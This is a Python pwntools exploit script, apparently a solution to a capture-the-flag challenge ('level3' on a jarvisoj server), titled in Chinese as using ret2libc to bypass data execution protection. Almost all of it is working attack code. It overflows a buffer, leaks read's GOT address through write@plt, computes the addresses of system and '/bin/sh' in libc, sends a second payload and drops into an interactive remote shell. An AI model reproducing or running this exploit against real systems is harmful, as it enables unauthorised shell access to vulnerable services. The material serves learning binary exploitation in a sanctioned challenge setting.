使用ret2libc攻击方法绕过数据执行保护
from pwn import*
conn = remote("pwn2.jarvisoj.com",9879)
elf = ELF('level3')
libc = ELF('libc-2.19.so')
plt_write = elf.symbols['write'] #0804834
print 'plt_write = ' + hex(plt_write)
got_read = elf.got['read'] #0804A00C
print 'got_read = ' + hex(got_read)
payload = 0x8C * 'a'
payload += p32(plt_write)
payload += p32(0x0804844B)
payload += p32(1)
payload += p32(got_read)
payload += p32(4)
conn.recvuntil("Input:
")
conn.send(payload)
temp = conn.recv(4)
read_addr = u32(temp[0:4])
print 'read_addr = ' + hex(read_addr)
libc_read_addr = 0x000daf60 #readelf -a ./libc-2.19.so | grep "read@"
offset = read_addr - libc_read_addr
libc_system_addr = 0x00040310 #readelf -a ./libc-2.19.so | grep "system@"
system_addr = offset + libc_system_addr
libc_binsh_addr = 0x16084c #strings -a -t x .//libc-2.19.so' | grep "/bin/sh"
binsh_addr = offset + libc_binsh_addr
ret = 0x08048480
payload = 0x8C * 'a' + p32(system_addr) + p32(ret) + p32(binsh_addr)
conn.send(payload)
conn.interactive()